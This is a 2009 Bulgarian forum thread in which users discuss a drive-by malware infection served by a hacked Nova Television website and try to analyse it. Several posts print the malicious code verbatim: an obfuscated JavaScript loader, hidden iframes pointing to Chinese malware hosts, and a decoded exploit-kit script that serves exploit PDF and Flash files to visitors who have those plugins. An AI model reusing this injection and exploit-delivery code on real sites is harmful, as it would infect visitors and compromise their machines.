Вируса в сайта на Нова Телевизия

[enkov]

Някой от вас успя ли да гепне като мен вируса от сайта на Нова Телевизия, снощи 03.06.2009 към 21-22 часа - до днес 04.06.2009 до към 11.30 седеше, после махнаха iframe с вируса поне, сайта още беше Under Construction?

Взимаше от китайски сървер един JS.Downloader, който сваляше 4-5-6 други трояна. Антивирусната ми хвана 2-3, но някои се мушнаха. Не помогна дори System Restore in Safe Mode, та правих System Restore 2 дни назад чрез ERD Commander 2007.

Бълваше конекции, смени ми svchost.exe, зарази ми Skype, опита се да праща емайли през Outlook Expres, опита се да ми изпрати WAB (не успя последните 2 неща де) и въртеше диска като луд. Reset-нах много бързо, минах в Safe Mode, пуснах System Restore, пуснах и Avira в Safe Mode (Win XP Pro SP2 съм).

[Smoke Bellew]

С какъв браузър става тази каша?

[enkov]

С IE, Firefox 3, Opera... Аз с IE/Maxthon, друг приятел с FF3 и трети с Опера 9. Всички бяхме с актуални антивируси, ад-блокъри, последни версии на браузърите! Всички го хванахме! Аз се оправих със System Restore, този с Опера си беше на Vista Ultimate 64, при него не хвана дикиш, ама се свалил и се опитал - Аваста му го хванал, но скайпа му бил сменен (32-битов е май). Този с ХР 32 и Фирефокс още се чисти и май сега преинсталира в момента!

[Nuclear]

Сигурен ли си, че си го хванал от сайта им, а не от някъде другаде (някое неизвестно сайтче).
С удоволствие бих пробвал под линукс, или с ограничен win акаунт, но жалко че е under construction

[tedych]

Е, е... нещо не ми се вярва.
Освен ако не е някой доста упорит вирус in the wild.
Чак всички браузъри да успеят да го пуснат...

[enkov]

Всички се задействаха, не искам да поствам тук линкове и кодове!

На Опера под Виста64 / Avast се блокирал, разбира се!

Човека с Фирефокс и NoScript беше с NOD32 4.0, аз бях с IE6/Maxthon и Avira Personal (да, аз съм най-уязвим, но имам бекъпи и ресторе и се оправих).

Аз точно затова питам, дали знаете за тази гадина, не се правя на интересен, нито нищо! Програмист съм от 1986-та на практика, бях администратор на голяма мрежа (университета) 2-3 години 1997-2000, писал съм драйвери за файлова система за 2000/ХР, та знам как работят и как се махат вируси и кво ли не! Просто не очаквах от един реномиран сайт www.ntv.bg да се случи това. При това седеше Under Construction -не САЙТА Е ХАКНАТ или пък да е си е същият и да си се мушква подмолно (леле, кво ли щеше да е, ако беше последното, ама то китайците нямат толкоз акъл, а и не четат български, хихи!).

То си пишеше UNDER CONSTRUCTION и снощи - но имаше iframe с препратка към китайски сайт, който Firefox под Убунту ми каза днес, че е рапортуван като пращащ троянци!
Днес май няма този iframe! Не искам да поствам този линк...

Да, от www.ntv.bg се хвана, абсолютно съм сигурен! И сорса имаше това iframe.

И още, мисля че РНР-то на китайците проверява кой браузър/ОС го викат и на Линукс май връща празна страница (коректна с хедъри, но с празно тяло). Може и да връща оптимизирани за клиента пакети троянци и джаваскриптове! Логично е и не е толкоз трудно! Да, това може да се мами, но повечето хора не си сменят идентификацията на браузъра/ОС в браузърите.

[vbdasc]

Цитат:

Първоначално публикувано от enkov

Програмист съм от 1986-та на практика, бях администратор на голяма мрежа (университета) 2-3 години 1997-2000, писал съм драйвери за файлова система за 2000/ХР, та знам как работят и как се махат вируси и кво ли не!

Но си работил в Интернет под администраторски акаунт?

[tedych]

Ми Apache 1.33, PHP 4.4.x. Сигурно и Линукс..
Кво да говорим. Освен ако това не е само за момента.

Не подлагам на съмнение опита ти в програмирането, просто за да подмами всеки един браузър, ми е малко съмнително, това би трябвало да изпозлва нещо примерно бъг в друг компонент, примерно флаш.
И как ще обясниш че е влязал и през noscript?
Аз така мога да го обясня.

[enkov]

Е, не съм с Виста, с админ акаунт съм, да - домашният ми компютър е това! Не казвам, че не съм си го пуснал самичък, виновен съм - питах друг забелязал ли го е тва чудо или не? Аз лично си го махнах!

За сърверите и прочие съм си по-внимателен, споко! А и се отказах да съм администратор, по други причини (бюрокрация, не плащаха допълнително - аз съм главен асистент, не съм администратор като позиция, разправии с потребители и най-вече тогава се ожених - мисля че това стига). За домашното си РС не съм маниак, разбира се!

За NoScript не знам, ще питам приятелчето с Фирефокса, дето го гепна! О, леле - той го пуснал под Chrome....

От него също - забелязва сменени UserInit.Exe, добавено Win32x.sys (x, не k), svchost.exe му бил променен и той! И 11130XX.EXE и RNCSYS32.EXE. Олеле!

[VAISHO]

Сайта на Предавател.com също имаше вирус предната седмица. Сега е наред и с леко променен интерфейс.

[tedych]

Добре де какво става, това е много притеснително.
Абс. всеки браузър да пуска тая гад, не е на добре. Явно не е от самите браузъри. Flash? Или Java аплети?
Или просто така ти виждат IP адреса, и те атакуват по някой незнаен порт, за който са намерили нов експлоит?
Според мен това че всеки браузър го пуска, означава че е нещо друго. а браузъра е само посредник или да ти разберат ИП-то.

[enkov]

Нали точно това се питам и аз, ама за 'жалост' (в кавички) много бързо се ресторнах и сега нямам как да направя 'разследване'!

Имаше със сигурност опити да пусне JS.Downloader, а той да дръпне друго. Иначе, че ти виждат айпито, версията на ОС, Браузъра и версиите на Java, .Net Framework и кво ли не още - е много ясно и после могат да комбинират атаки! Или да свалят дребен бекдоор, който да свали другите неща!

То и аз с IE6 и admin акаунт на ХР съм си надупен де, ама карай!

[BlackDonald]

Ако разчиташ на вирусни дефиниции да те опазят,си доста уязвим.

Цитат:

Security technology that works: Anti Viruses have lost the war, period! Anti Virus should not and can not be your first line of defense in your security! Anti Virus is a default Allow system. Consumers spend over $5Billion (Billion with a capital B) on something that really doesn’t protect them! The security model needed to change, from default allow system to a default deny system, from detection being your first line of defense, prevention being the first line of defense.

[enkov]

Вижте сега, това го знам по-добре от вас! Темата е - някой друг видял ли е или чул нещо за вируса от сайта на Нова Телевизия! Какъв е и как се маха! Все някой ще го е усетил това нещо!

Ето линка с интервали, за да не се пуска автоматично

http : / / combinebet . cn : 8080 / index . php

това беше в iframe! Не гледайте в Linux или в конзолни браузъри и прочие - явно анализира клиента! Днес в Убунту ми върна читава страница, но снощи си върна гадини, ама като ресторнах се загубиха, а и изтрих и кеша на браузъра!

НАМЕРИХ НЕЩО ПОДОБНО, но не знам в Нова ТВ същото ли беше!

</head><script type="text/javascript">var hPLAmyvsdfELzjhpwQYf = "EOje60EOje105EOje102EOje114EOje97EOje10 9EOje101EOje32EOje119EOje105EOje100EOje1 16EOje104EOje61EOje34EOje52EOje56EOje48E Oje34EOje32EOje104EOje101EOje105EOje103E Oje104EOje116EOje61EOje34EOje54EOje48EOj e34EOje32EOje115EOje114EOje99EOje61EOje3 4EOje104EOje116EOje116EOje112EOje58EOje4 7EOje47EOje116EOje114EOje97EOje102EOje10 2EOje105EOje99EOje45EOje114EOje101EOje11 5EOje111EOje117EOje114EOje99EOje101EOje1 15EOje46EOje99EOje110EOje47EOje111EOje11 4EOje100EOje101EOje114EOje47EOje105EOje1 10EOje46EOje99EOje103EOje105EOje63EOje50 EOje34EOje32EOje115EOje116EOje121EOje108 EOje101EOje61EOje34EOje98EOje111EOje114E Oje100EOje101EOje114EOje58EOje48EOje112E Oje120EOje59EOje32EOje112EOje111EOje115E Oje105EOje116EOje105EOje111EOje110EOje58 EOje114EOje101EOje108EOje97EOje116EOje10 5EOje118EOje101EOje59EOje32EOje116EOje11 1EOje112EOje58EOje48EOje112EOje120EOje59 EOje32EOje108EOje101EOje102EOje116EOje58 EOje45EOje53EOje48EOje48EOje112EOje120EO je59EOje32EOje111EOje112EOje97EOje99EOje 105EOje116EOje121EOje58EOje48EOje59EOje3 2EOje102EOje105EOje108EOje116EOje101EOje 114EOje58EOje112EOje114EOje111EOje103EOj e105EOje100EOje58EOje68EOje88EOje73EOje1 09EOje97EOje103EOje101EOje84EOje114EOje9 7EOje110EOje115EOje102EOje111EOje114EOje 109EOje46EOje77EOje105EOje99EOje114EOje1 11EOje115EOje111EOje102EOje116EOje46EOje 65EOje108EOje112EOje104EOje97EOje40EOje1 11EOje112EOje97EOje99EOje105EOje116EOje1 21EOje61EOje48EOje41EOje59EOje32EOje45EO je109EOje111EOje122EOje45EOje111EOje112E Oje97EOje99EOje105EOje116EOje121EOje58EO je48EOje34EOje62EOje60EOje47EOje105EOje1 02EOje114EOje97EOje109EOje101EOje62";var wyAIvMIOvBsdRDeECZxg = hPLAmyvsdfELzjhpwQYf.split("EOje");var EBrElZthpSMlQNtLZBZV = "";for (var DRzVVdaXDXEHYwLKVFrL=1; DRzVVdaXDXEHYwLKVFrL<wyAIvMIOvBsdRDeECZx g.length; DRzVVdaXDXEHYwLKVFrL++){EBrElZthpSMlQNtL ZBZV+=String.fromCharCode(wyAIvMIOvBsdRD eECZxg[DRzVVdaXDXEHYwLKVFrL]);}var FmdulWQzUMVHZPWHWyXp = ""+EBrElZthpSMlQNtLZBZV+"";document.writ e(""+FmdulWQzUMVHZPWHWyXp+"")</script>
<body><iframe src="http://combinebet.cn:8080/index.php" width=166 height=117 style="visibility: hidden"></iframe>
<center>
<br><br><br><br>
<font size="1" face="Verdana">Welcome to<br><b><br>
<br>


Тва мяса на яко буфер препълване и инжектиране, да му се не види!

[johnny_fx]

Не знам за нова телевизия, обаче тази седмица за 2 дни, на 2 сайта които поддържам се бяха наврели някакви скриптове в индекс файловете на cms-a. Изчистих ги и оправих работата с гугъл, но за мен е озадачаващо. После намерих някакъв троянец в компа и си мисля, да не би той да е снифнал паролите за сайтовете, чрез тъпия и незащитен ftp протокол.

[enkov]

Ама май ще се окаже и експлоит в Acrobat Reader намесен - на това ми мирише за Нова Телевизия. Май е сбор от няколко експлоита, да им се не видят и китайците!

Тедич май е прав! Извън браузъра е!

[johnny_fx]

Да точно за дупка в Acrobat Reader-а се говори.
Най-добре го разкарайте и слагайте Foxit Reader. Има си и плъгин за Firefox, и е по-лек.

[pimpirlit]

Споко де, не е нито първият, нито последният, а просто поредният инфектиран с iFrame сайт.

Китайският (руския/украински/индийски/etc) сайт анализира не само браузъра, OS, но и компонентите, както беше споменато вече. От където намери пробойна, от там ви надзвъцква г*за с човечета. Ако не намери - ми нищо. Подобен случай обсъждахме ТУК и понеже някои колеги там си поддържат софтуера в актуалност (очевидно), не успяха да прихванат и погрешно решиха, че е безопасно.

В тоя ред на мисли е полезно да ползвате някоя от помощните програмки на Secunia за сканиране на компютъра за уюязвим софтуер. И да си го пачнете или каквото там ви посъветва.

[tedych]

Хехе, аз Акробата в браузърите НЕ го ползвам, период. Никога.
Винаги ми е направено да се сваля всичко, де е за акробат.
Ох, да поотдъхнем. Но винаги зад отдъхването седят няколко разбити сърца, в случая компютъра. Но такъв е живота.
А за javascript-a, ако на някой му се занимава да декодира и да даде какъв резултат излиза от простото маскиране на нещата, които е пейстнал enkov, няма да се разсърдим, мен ме мързи, макар че по-късно може и да си поиграя.

Между другото къде пише за това, и къде видяхте за акробат?

[vbdasc]

Цитат:

Първоначално публикувано от tedych

Хехе, аз Акробата в браузърите НЕ го ползвам, период. Никога.
Винаги ми е направено да се сваля всичко, де е за акробат.
Ох, да поотдъхнем. Но винаги зад отдъхването седят няколко разбити сърца, в случая компютъра. Но такъв е живота.
А за javascript-a, ако на някой му се занимава да декодира и да даде какъв резултат излиза от простото маскиране на нещата, които е пейстнал enkov, няма да се разсърдим, мен ме мързи, макар че по-късно може и да си поиграя.

Между другото къде пише за това, и къде видяхте за акробат?

Ето това е уязвимостта.

[Pesho®]

Цитат:

Първоначално публикувано от tedych

А за javascript-a, ако на някой му се занимава да декодира и да даде какъв резултат излиза от простото маскиране на нещата, които е пейстнал enkov, няма да се разсърдим, мен ме мързи, макар че по-късно може и да си поиграя.

Поиграх си малко: след "разкодирането" на маскираната част, javascript-ът я writeln-ва в документа. Съдържанието ѝ е следното:

Код:

<iframe width="480" height="60" src="http://traffic-resources.cn/order/in.cgi?2" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

Ако на някой му е интересно, да разследва по-нататък (какво се случва във въпросния iframe). На пръв поглед прилича на обикновен банер, но след толкова усилия за замаскирането му, може да има нещо.

[enkov]

Ето, Кевин ми прати снощният сорс: От НОВА ТЕЛЕВИЗИЯ

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=windows-1251">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="cache-control" CONTENT="no-cache">
<TITLE>Nova Television web-page</TITLE>
<META NAME="GENERATOR" CONTENT="simple text editor">
<META NAME="AUTHOR" CONTENT="Dimitar Lilov">
<META NAME="CREATED" CONTENT="2009.06.03;16:43">
<META NAME="CHANGED" CONTENT="2009.06.03;16:44">
</HEAD>
<BODY LANG="en-US" BGCOLOR="#999999" TEXT="#000000" TOPMARGIN="2" MARGINHEIGHT="2" LEFTMARGIN="2" MARGINWIDTH="2"><iframe src="http://combinebet.cn:8080/index.php" width=119 height=189 style="visibility: hidden"></iframe>
<p align="center">
<img src="under-construction_animated.gif">
</p>

[Nuclear]

Цитат:

Първоначално публикувано от enkov

Ето, Кевин ми прати снощният сорс: От НОВА ТЕЛЕВИЗИЯ

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=windows-1251">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="cache-control" CONTENT="no-cache">
<TITLE>Nova Television web-page</TITLE>
<META NAME="GENERATOR" CONTENT="simple text editor">
<META NAME="AUTHOR" CONTENT="Dimitar Lilov">
<META NAME="CREATED" CONTENT="2009.06.03;16:43">
<META NAME="CHANGED" CONTENT="2009.06.03;16:44">
</HEAD>
<BODY LANG="en-US" BGCOLOR="#999999" TEXT="#000000" TOPMARGIN="2" MARGINHEIGHT="2" LEFTMARGIN="2" MARGINWIDTH="2"><iframe src="http://combinebet.cn:8080/index.php" width=119 height=189 style="visibility: hidden"></iframe>
<p align="center">
<img src="under-construction_animated.gif">
</p>

A eто какво има вътре:
Интересното е, че като пробвах да го пусна за втори път, изкара празен файл:

Код:

<html>
<body>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g 5(){m{l(i=0;i<=8.7.j;i++){2=8.7[i].2;a((2.4("6 k")!=-1)||(2.4("6 r")!=-1)){9.b(\'<3 c="d/p.q"></3>\')}a(2.4("o")!=-1){9.b(\'<3 c="d/n.f"></3>\')}}}h(e){}}5();',28,28,'||name|iframe|indexOf|K2m7mc235|Adobe|plugins|navigator|document|if|write|src|cache||swf|function|catch||length|Acrobat|for|try|flash|Flash|readme|pdf|PDF'.split('|'),0,{}))
</script>
</body>
</html>

Това от предния ти пост пробвах да го пусна под уиндоус, но не излезе нищо.
Пуснах и това, дадено от Pesho®, тръгна да сваля някакъв pdf, но IE се самозатвори. То всъщност пренасочва към ht*tp://bingos-totonya2.com/2/index.php Пробвах го под ограничен акаунт и засега няма видими щети (нямам антивирусна )

EDIT: Мислейки ме за Firefox, bingos-totonya2.com издаде още нещо:

 

Код:

<script>

function myframe(sData)
{
        document.write(sData);
}

try
{
        for(i = 0; i <= navigator.plugins.length; i++)
        {
                name = navigator.plugins[i].name;

                if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1))
                {
                        myframe('<iframe src="data/exp/0.pdf"></iframe>');
                }

                if(name.indexOf("Flash") != -1)
                {
                        myframe('<iframe src="data/exp/0.swf"></iframe>');
                }
        }
}

catch(e){}

[enkov]

Ясно е, че е комбиниран, анализиращ няколко пробива, вирус!

Карай!

[Nuclear]

Хм, възможно ли е като отворя pdf-а, да почне да прави поразии по PC-то ми? Че гледам в самия pdf (като го отворя с Notepad) има някакви скриптове.